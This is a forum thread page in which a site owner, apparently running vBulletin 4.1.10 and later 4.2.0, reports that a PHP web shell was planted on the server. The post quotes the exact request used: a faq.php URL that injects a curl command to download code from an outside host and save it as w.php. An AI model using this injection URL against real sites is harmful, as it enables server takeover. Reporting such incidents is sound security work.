|
إنضمامك إلي منتديات استراحات زايد يحقق لك معرفة كل ماهو جديد في عالم الانترنت ...
انضم الينا
#1
| ||
| ||
Hi, Today I found a file uploaded to my site, w.php. It was a classic php script that gives full access to the server. The file was added to my server by someone going to: myforums.com/faq.php?c=curl%20http://wsipay.com/w.txt%20-o%20w.php I was running 4.1.10 but I upgraded thinking that it might be an old exploit. But I find it still downloads the file successfully having upgraded to 4.2.0, it happily downloads the file to my site just by going to that URL. __DEFINE_LIKE_SHARE__ |
مواقع النشر (المفضلة) |
| |
![]() | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
Vulnerability in 3.8.5 | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 07-23-2010 09:40 AM |
Vbulletin Blog 4.0.2 Title XSS Vulnerability | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 04-29-2010 03:50 PM |
Forum Security vulnerability blogs 4.02 | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 04-10-2010 03:20 AM |
Forum new XSS vulnerability [4.0.2 PL 1] we are affected? | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 03-21-2010 05:37 PM |
vulnerability (vBulletin 3.8.2)? | محروم.كوم | منتدى أخبار المواقع والمنتديات العربية والأجنبية | 0 | 05-01-2009 12:30 AM |